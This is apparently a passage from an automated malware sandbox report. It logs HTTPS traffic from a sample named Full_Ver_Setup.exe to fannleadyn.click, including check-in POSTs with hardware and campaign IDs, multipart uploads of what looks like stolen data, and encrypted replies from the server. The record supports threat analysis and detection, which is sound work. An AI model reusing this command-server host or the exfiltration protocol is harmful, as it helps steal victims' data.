                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iXUzKF1Q%2F8WsB5NPgXLa%2FFCwCBg5cRwPenK%2BhHmy%2FlVUbmphb3pZjptooqyjrcR8KlCMp6Ypjt50vSAnW0lNw0aZxxb7zWmGWh%2FxrAAKw19u4S34Z1lf3cLO0ysKvNpxYOF8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e471a127ca6-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1943&min_rtt=1939&rtt_var=736&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1479229&cwnd=236&unsent_bytes=0&cid=acf1da5d0741ef52&ts=751&x=0"
                                                                                                                                                                2024-12-22 22:30:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                                2024-12-22 22:30:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.2.449731104.21.63.2294436476C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-22 22:30:21 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 78
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:21 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397
                                                                                                                                                                2024-12-22 22:30:22 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:22 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=nh61823568akutnos2jdan783o; expires=Thu, 17 Apr 2025 16:17:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVdJ6dk%2Bh4ZunlYBJnGw8w4mL4XsQ7onRcjRC1Ie%2BhPaDV2XuZscetzqTF2Opo9yGE29IpYMTQYXHVQezHc%2BNHuLm85lyvjs6PxRk%2FYwbcpCESnUgmS%2FXvatMGzjdfDcChlc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e5369fb4405-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1574&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=978&delivery_rate=1782661&cwnd=221&unsent_bytes=0&cid=94c5f51018949e61&ts=791&x=0"
                                                                                                                                                                2024-12-22 22:30:22 UTC244INData Raw: 34 36 64 0d 0a 4e 69 52 6f 4c 71 69 32 2b 43 6d 33 6b 4a 4c 64 56 33 79 78 32 50 75 58 32 7a 2b 4a 58 76 43 46 48 49 78 4b 63 34 50 74 6c 76 56 4e 42 68 34 4d 6b 6f 4c 55 43 38 54 31 73 4f 63 6a 44 73 53 39 31 37 57 36 57 36 74 6b 6c 75 52 77 2f 79 39 66 6f 5a 76 37 31 77 78 43 43 55 4c 62 30 39 51 4c 30 75 69 77 35 77 77 48 6b 37 32 56 74 65 45 64 37 44 53 53 35 48 44 75 4b 78 6a 73 6e 66 71 57 58 6b 67 50 52 73 33 56 6e 45 6a 62 2f 66 65 34 4d 68 33 62 74 70 4c 36 73 31 4b 72 63 74 4c 67 5a 71 35 77 55 63 36 49 34 70 52 37 52 52 74 46 69 73 76 55 55 70 58 31 2f 50 39 74 58 74 43 39 6d 66 75 39 57 2b 49 32 6d 4f 31 34 37 79 34 5a 38 34 54 77 6e 56 35 47 44 45 66 48 33 49 68 46 30 66 72 38 76 6a 67 64 6b 2f 54 5a 38 71 45
                                                                                                                                                                Data Ascii: 46dNiRoLqi2+Cm3kJLdV3yx2PuX2z+JXvCFHIxKc4PtlvVNBh4MkoLUC8T1sOcjDsS917W6W6tkluRw/y9foZv71wxCCULb09QL0uiw5wwHk72VteEd7DSS5HDuKxjsnfqWXkgPRs3VnEjb/fe4Mh3btpL6s1KrctLgZq5wUc6I4pR7RRtFisvUUpX1/P9tXtC9mfu9W+I2mO147y4Z84TwnV5GDEfH3IhF0fr8vjgdk/TZ8qE
                                                                                                                                                                2024-12-22 22:30:22 UTC896INData Raw: 64 73 33 7a 42 31 58 33 2f 4f 51 54 73 6e 2f 4c 58 53 77 67 54 44 4d 33 59 32 68 4f 56 2b 76 79 78 4d 42 33 63 76 5a 6a 31 71 31 4c 72 50 35 72 76 65 75 51 6e 48 75 36 42 2f 70 42 63 54 77 31 44 7a 64 79 63 52 4e 61 79 76 76 38 79 42 70 50 69 32 64 57 70 58 75 67 6f 6e 2f 59 2b 38 57 59 49 6f 59 6a 34 31 77 77 47 44 45 4c 4c 32 5a 70 5a 33 66 6e 37 75 69 63 56 32 72 65 55 39 62 52 58 35 44 2b 53 34 48 54 6b 4a 78 76 6c 67 76 6d 52 56 45 5a 4b 41 6f 72 54 67 67 75 4e 73 74 4f 36 4a 52 6e 66 72 4e 76 50 2b 55 4b 6c 4a 64 4c 67 63 71 35 77 55 65 6d 4b 39 35 52 66 53 51 6c 45 77 63 61 61 57 64 50 2f 39 61 30 7a 47 39 32 77 6d 75 65 7a 55 2b 30 2f 6d 2b 78 33 36 79 38 56 6f 63 47 30 6b 45 77 47 55 67 7a 72 32 5a 46 48 33 2b 58 77 2f 79 70 51 79 76 71 65 2b 66
                                                                                                                                                                Data Ascii: ds3zB1X3/OQTsn/LXSwgTDM3Y2hOV+vyxMB3cvZj1q1LrP5rveuQnHu6B/pBcTw1DzdycRNayvv8yBpPi2dWpXugon/Y+8WYIoYj41wwGDELL2ZpZ3fn7uicV2reU9bRX5D+S4HTkJxvlgvmRVEZKAorTgguNstO6JRnfrNvP+UKlJdLgcq5wUemK95RfSQlEwcaaWdP/9a0zG92wmuezU+0/m+x36y8VocG0kEwGUgzr2ZFH3+Xw/ypQyvqe+f
                                                                                                                                                                2024-12-22 22:30:22 UTC1369INData Raw: 34 61 65 31 0d 0a 37 35 4c 71 79 50 63 2f 6a 37 70 4a 46 47 35 7a 2f 75 59 57 30 34 4b 54 63 37 5a 6e 6b 72 59 2f 76 6d 38 4f 52 4c 62 74 35 58 78 74 6c 58 6a 50 35 72 31 63 4f 41 75 46 2b 47 4b 74 4e 6b 55 51 52 49 4d 6b 70 53 2b 52 63 4c 6d 2b 2f 30 41 48 64 32 30 6e 75 50 35 51 71 55 6c 30 75 42 79 72 6e 42 52 37 34 4c 2f 6d 31 4e 50 43 30 2f 4b 33 70 52 45 33 2f 72 34 76 7a 67 66 32 4c 4b 66 2b 4c 4a 53 35 44 75 61 35 48 4c 72 4a 52 4b 68 77 62 53 51 54 41 5a 53 44 4f 2f 61 6d 56 72 45 73 4d 57 38 4f 78 44 55 72 4e 6e 71 39 30 53 72 4f 35 36 6e 4a 71 34 69 46 75 61 4c 2b 5a 31 58 51 67 35 42 78 64 32 54 51 73 66 34 2f 4c 45 6e 45 39 6d 2f 6c 2f 6d 38 55 75 73 39 6b 2b 6c 30 35 57 68 66 6f 59 6a 73 31 77 77 47 4a 55 48 61 78 70 42 41 78 4c 44 46 76 44
                                                                                                                                                                Data Ascii: 4ae175LqyPc/j7pJFG5z/uYW04KTc7ZnkrY/vm8ORLbt5XxtlXjP5r1cOAuF+GKtNkUQRIMkpS+RcLm+/0AHd20nuP5QqUl0uByrnBR74L/m1NPC0/K3pRE3/r4vzgf2LKf+LJS5Dua5HLrJRKhwbSQTAZSDO/amVrEsMW8OxDUrNnq90SrO56nJq4iFuaL+Z1XQg5Bxd2TQsf4/LEnE9m/l/m8Uus9k+l05WhfoYjs1wwGJUHaxpBAxLDFvD
                                                                                                                                                                2024-12-22 22:30:22 UTC1369INData Raw: 32 64 71 36 53 2b 46 38 6a 61 6c 6e 72 69 38 64 6f 64 65 30 6e 56 68 43 43 55 44 44 32 4a 64 4b 30 66 58 39 75 7a 55 59 31 62 2b 59 2f 72 46 52 35 44 61 65 34 33 4c 6e 4c 68 33 69 6a 50 4c 58 47 67 59 4e 56 49 71 4d 32 6d 72 59 2b 66 79 2f 4e 67 2f 55 2b 74 65 31 74 31 76 72 66 4d 72 78 62 76 6b 76 44 71 2b 57 74 4a 42 59 42 6c 49 4d 77 4d 61 66 52 64 48 34 39 62 73 35 46 4e 4f 2f 69 2f 32 2f 57 75 63 30 6c 2b 68 34 36 79 55 57 36 6f 7a 6d 68 56 64 43 42 45 43 4b 6d 74 70 4d 7a 62 4b 6f 2f 78 41 4a 30 4b 71 66 39 76 6c 43 70 53 58 53 34 48 4b 75 63 46 48 68 67 66 69 63 55 30 30 42 53 4d 37 55 6c 30 44 62 2f 50 6d 7a 50 52 4c 55 71 4a 54 77 73 56 66 69 4f 5a 37 71 66 66 77 72 45 4b 48 42 74 4a 42 4d 42 6c 49 4d 37 65 65 74 61 4a 58 74 76 71 5a 31 47 64 2f
                                                                                                                                                                Data Ascii: 2dq6S+F8jalnri8dode0nVhCCUDD2JdK0fX9uzUY1b+Y/rFR5Dae43LnLh3ijPLXGgYNVIqM2mrY+fy/Ng/U+te1t1vrfMrxbvkvDq+WtJBYBlIMwMafRdH49bs5FNO/i/2/Wuc0l+h46yUW6ozmhVdCBECKmtpMzbKo/xAJ0Kqf9vlCpSXS4HKucFHhgficU00BSM7Ul0Db/PmzPRLUqJTwsVfiOZ7qffwrEKHBtJBMBlIM7eetaJXtvqZ1Gd/
                                                                                                                                                                2024-12-22 22:30:22 UTC1369INData Raw: 56 37 6b 4e 39 4c 34 4d 50 64 6f 46 75 33 50 72 4e 64 54 54 67 4a 43 79 64 4b 52 52 39 6e 7a 2b 62 6b 77 46 74 53 31 6e 76 79 2b 58 65 30 75 6c 65 70 33 37 69 4d 59 36 34 76 31 6e 42 51 49 53 6b 76 53 6c 4d 49 4c 35 2f 58 6d 72 7a 5a 65 7a 50 53 41 74 62 35 52 71 32 54 53 36 6d 7a 76 4c 51 50 6c 67 50 2b 46 58 30 41 4b 53 64 6a 54 6c 6b 48 61 38 66 69 79 4e 68 62 42 75 70 54 31 71 30 2f 74 4e 35 79 6e 4d 4b 34 76 43 61 48 58 74 4b 5a 44 54 55 70 54 68 4d 33 61 54 4e 6d 79 71 50 38 32 46 4e 36 30 69 2f 47 2f 56 75 67 79 6d 75 4a 32 36 69 49 63 37 6f 54 2b 6e 6c 78 47 42 55 6e 43 33 35 78 46 31 50 54 38 73 6e 56 51 6b 37 32 42 74 65 45 64 7a 43 61 66 34 57 6e 2f 48 52 62 68 33 72 53 49 47 6c 39 4b 53 38 61 55 77 67 76 59 2f 76 71 79 4d 42 72 62 76 5a 72 30
                                                                                                                                                                Data Ascii: V7kN9L4MPdoFu3PrNdTTgJCydKRR9nz+bkwFtS1nvy+Xe0ulep37iMY64v1nBQISkvSlMIL5/XmrzZezPSAtb5Rq2TS6mzvLQPlgP+FX0AKSdjTlkHa8fiyNhbBupT1q0/tN5ynMK4vCaHXtKZDTUpThM3aTNmyqP82FN60i/G/VugymuJ26iIc7oT+nlxGBUnC35xF1PT8snVQk72BteEdzCaf4Wn/HRbh3rSIGl9KS8aUwgvY/vqyMBrbvZr0
                                                                                                                                                                2024-12-22 22:30:22 UTC1369INData Raw: 75 65 70 79 61 75 4a 68 7a 6e 6a 76 57 66 58 45 59 4d 52 73 37 58 6b 30 6a 53 2b 2f 61 30 4e 68 54 63 76 5a 2f 78 75 56 62 73 4d 70 54 69 64 65 64 6f 58 36 47 49 37 4e 63 4d 42 69 78 76 32 4d 61 6f 52 64 62 70 73 4b 42 37 42 35 4f 39 6c 62 58 68 48 65 41 30 6e 66 56 37 35 79 41 56 36 49 2f 77 6e 56 6c 42 43 6b 6e 48 30 5a 35 46 30 66 58 77 73 7a 6f 5a 32 37 57 64 39 62 59 64 70 58 79 56 2f 7a 36 32 61 44 48 71 6d 64 57 5a 58 31 52 4b 55 34 54 4e 32 6b 7a 5a 73 71 6a 2f 4f 78 66 53 73 70 66 35 73 56 6e 35 50 4a 6e 75 63 65 38 6e 45 65 4b 4f 2f 70 39 47 51 41 70 48 77 74 4f 53 54 39 76 67 38 62 42 31 55 4a 4f 39 67 62 58 68 48 64 6f 71 6c 65 42 78 72 41 45 57 2b 6f 37 2b 6c 46 39 4b 53 6c 4f 45 7a 64 70 4d 32 62 4b 6f 2f 7a 67 53 33 72 36 4c 2b 62 6c 64 34
                                                                                                                                                                Data Ascii: uepyauJhznjvWfXEYMRs7Xk0jS+/a0NhTcvZ/xuVbsMpTidedoX6GI7NcMBixv2MaoRdbpsKB7B5O9lbXhHeA0nfV75yAV6I/wnVlBCknH0Z5F0fXwszoZ27Wd9bYdpXyV/z62aDHqmdWZX1RKU4TN2kzZsqj/OxfSspf5sVn5PJnuce8nEeKO/p9GQApHwtOST9vg8bB1UJO9gbXhHdoqleBxrAEW+o7+lF9KSlOEzdpM2bKo/zgS3r6L+bld4
                                                                                                                                                                2024-12-22 22:30:22 UTC1369INData Raw: 31 34 43 30 51 37 59 58 7a 6d 55 5a 48 41 45 44 4c 30 35 31 41 78 2f 6e 69 74 44 30 64 33 62 4b 51 39 62 64 64 36 6a 47 53 70 7a 43 75 4c 77 6d 68 31 37 53 79 64 31 45 63 52 6f 6a 33 6a 56 33 66 39 66 79 70 50 68 2f 51 72 4a 54 6c 2b 52 4f 72 4c 5a 58 32 50 72 59 2b 41 66 61 49 36 39 6c 4e 42 67 31 41 69 6f 7a 61 51 4e 72 38 2f 62 51 78 46 39 61 79 6d 76 43 38 56 2b 63 77 6b 2b 39 33 35 43 30 55 35 34 58 33 6d 56 74 48 42 6b 6a 44 32 70 4d 4c 6d 37 4c 33 70 33 56 47 6b 34 79 4a 38 71 46 51 2b 33 36 67 35 47 2f 2f 50 52 7a 78 69 62 61 34 56 30 6f 4a 53 63 33 45 32 6c 53 62 36 37 43 34 4f 56 36 4c 2b 70 6e 78 74 56 37 73 4d 70 33 71 63 65 6b 6a 48 75 75 42 35 70 68 52 54 67 5a 45 78 38 61 51 51 63 66 37 2b 62 49 37 46 73 47 35 32 62 76 35 57 76 4e 38 79 71
                                                                                                                                                                Data Ascii: 14C0Q7YXzmUZHAEDL051Ax/nitD0d3bKQ9bdd6jGSpzCuLwmh17Syd1EcRoj3jV3f9fypPh/QrJTl+ROrLZX2PrY+AfaI69lNBg1AiozaQNr8/bQxF9aymvC8V+cwk+935C0U54X3mVtHBkjD2pMLm7L3p3VGk4yJ8qFQ+36g5G//PRzxiba4V0oJSc3E2lSb67C4OV6L+pnxtV7sMp3qcekjHuuB5phRTgZEx8aQQcf7+bI7FsG52bv5WvN8yq
                                                                                                                                                                2024-12-22 22:30:22 UTC1369INData Raw: 4c 38 47 45 34 70 5a 5a 54 51 5a 79 39 4d 47 5a 52 64 76 31 35 71 35 31 55 4a 4f 31 32 61 32 41 48 61 4e 38 72 61 6b 2b 39 6d 68 4a 6f 62 72 33 6d 56 70 42 48 46 32 48 39 4a 46 64 31 50 2f 37 73 33 63 66 33 71 71 65 74 66 63 64 37 58 7a 4b 74 7a 43 75 4c 41 43 68 31 36 54 46 44 78 4e 5a 47 35 71 47 68 51 58 4d 73 75 62 2f 62 55 79 64 2b 6f 75 31 34 52 32 73 50 34 44 31 65 4f 30 2b 45 71 61 78 79 72 64 66 53 67 6c 41 79 39 50 61 42 5a 58 39 73 4f 63 4d 58 74 43 6f 69 37 71 6f 53 2b 59 73 6c 61 74 32 2f 79 55 64 6f 63 47 30 32 31 42 4e 42 6b 6e 4e 78 4e 56 5a 78 66 6e 38 71 58 6b 61 77 66 72 58 74 61 68 57 35 43 36 63 34 44 48 2f 50 68 7a 78 6a 50 47 51 47 45 34 62 51 63 61 55 31 41 76 41 2b 66 79 35 4f 41 75 63 71 34 2f 32 72 31 71 6e 4e 49 50 71 63 71 34
                                                                                                                                                                Data Ascii: L8GE4pZZTQZy9MGZRdv15q51UJO12a2AHaN8rak+9mhJobr3mVpBHF2H9JFd1P/7s3cf3qqetfcd7XzKtzCuLACh16TFDxNZG5qGhQXMsub/bUyd+ou14R2sP4D1eO0+EqaxyrdfSglAy9PaBZX9sOcMXtCoi7qoS+Yslat2/yUdocG021BNBknNxNVZxfn8qXkawfrXtahW5C6c4DH/PhzxjPGQGE4bQcaU1AvA+fy5OAucq4/2r1qnNIPqcq4
                                                                                                                                                                2024-12-22 22:30:22 UTC1369INData Raw: 37 54 50 46 48 4d 4a 51 73 54 54 6a 46 71 59 31 50 4f 34 4d 78 33 64 72 59 69 31 39 78 33 74 66 4d 71 31 4d 4b 34 73 41 4b 48 58 70 4d 55 50 45 31 6b 62 6d 6f 61 46 42 63 79 79 35 76 39 74 54 5a 33 36 69 37 58 68 48 61 77 79 6e 2b 5a 39 34 43 73 44 38 34 6e 33 67 56 63 42 4e 48 4c 76 32 5a 64 4f 32 2f 58 4f 67 52 51 55 77 37 65 57 38 6f 64 6a 33 43 32 56 39 7a 7a 49 4b 77 66 69 7a 37 72 58 54 41 5a 53 44 4f 76 65 69 6b 62 61 39 62 44 78 64 52 71 54 34 74 6e 51 74 46 44 75 4d 70 57 6c 58 2b 51 34 48 4f 36 49 74 4e 6b 55 53 6b 6f 55 69 74 57 51 57 39 6a 39 39 2f 4d 79 42 4e 54 36 31 37 57 33 48 62 4e 38 6b 2b 31 75 34 79 63 57 72 59 6e 36 6d 52 52 5a 52 46 57 4b 77 74 6f 54 68 72 79 77 72 58 56 47 6b 2f 32 58 2b 4c 68 65 35 54 2b 41 39 58 6a 74 50 68 4b 6d
                                                                                                                                                                Data Ascii: 7TPFHMJQsTTjFqY1PO4Mx3drYi19x3tfMq1MK4sAKHXpMUPE1kbmoaFBcyy5v9tTZ36i7XhHawyn+Z94CsD84n3gVcBNHLv2ZdO2/XOgRQUw7eW8odj3C2V9zzIKwfiz7rXTAZSDOveikba9bDxdRqT4tnQtFDuMpWlX+Q4HO6ItNkUSkoUitWQW9j99/MyBNT617W3HbN8k+1u4ycWrYn6mRRZRFWKwtoThrywrXVGk/2X+Lhe5T+A9XjtPhKm


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.2.449733104.21.63.2294436476C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-22 22:30:24 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: multipart/form-data; boundary=JOXNEUD6
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 18102
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:24 UTC15331OUTData Raw: 2d 2d 4a 4f 58 4e 45 55 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 44 38 32 37 38 41 37 45 43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 4a 4f 58 4e 45 55 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 4f 58 4e 45 55 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 4a 4f 58 4e 45 55 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                Data Ascii: --JOXNEUD6Content-Disposition: form-data; name="hwid"74D8278A7EC1EF22E9E2F0D64B3B48BA--JOXNEUD6Content-Disposition: form-data; name="pid"2--JOXNEUD6Content-Disposition: form-data; name="lid"hRjzG3--ZINA--JOXNEUD6Content-Dispositi
                                                                                                                                                                2024-12-22 22:30:24 UTC2771OUTData Raw: cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 e9 19 4d
                                                                                                                                                                Data Ascii: 3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{M
                                                                                                                                                                2024-12-22 22:30:25 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:25 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=3ih47jt85sj15996e3osn3map1; expires=Thu, 17 Apr 2025 16:17:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WaoYVauyQZXChvsJJIx35iBnpWsBp2mdQVkPJFD1DvJeAkOD3VIDGtH4hNZl50j2F68lQzNZB%2BQxtrzKIk7GogdlX7h6uydyJsD%2FuIx4b5T1GwNKis70hIeYMt3pTcVzJnrL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e639c7e42ad-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=15&recv=23&lost=0&retrans=1&sent_bytes=4220&recv_bytes=19054&delivery_rate=108168&cwnd=242&unsent_bytes=0&cid=bb2afdb7ff9a9984&ts=1251&x=0"
                                                                                                                                                                2024-12-22 22:30:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                2024-12-22 22:30:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                3192.168.2.449736104.21.63.2294436476C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-22 22:30:26 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: multipart/form-data; boundary=YS0G6TE8A
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 8729
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:26 UTC8729OUTData Raw: 2d 2d 59 53 30 47 36 54 45 38 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 44 38 32 37 38 41 37 45 43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 59 53 30 47 36 54 45 38 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 53 30 47 36 54 45 38 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 59 53 30 47 36 54 45 38 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                Data Ascii: --YS0G6TE8AContent-Disposition: form-data; name="hwid"74D8278A7EC1EF22E9E2F0D64B3B48BA--YS0G6TE8AContent-Disposition: form-data; name="pid"2--YS0G6TE8AContent-Disposition: form-data; name="lid"hRjzG3--ZINA--YS0G6TE8AContent-Dispo
                                                                                                                                                                2024-12-22 22:30:27 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:27 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=dogn9jjtv3jg6ac4cfb9on7as3; expires=Thu, 17 Apr 2025 16:17:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hdu2uxx4yifN5Z3G4GsON3T1CMAWKPaPGkQTbXNZqndLg4qyo2004b3uMSBWJuwKEhtDqhQHLzphuzN2KC8rf6pNDp2hYwuQzAnb%2F4sm6axTQc9tm9Q8V%2FhnVtuL4Ddx5B93"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e72282f426a-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
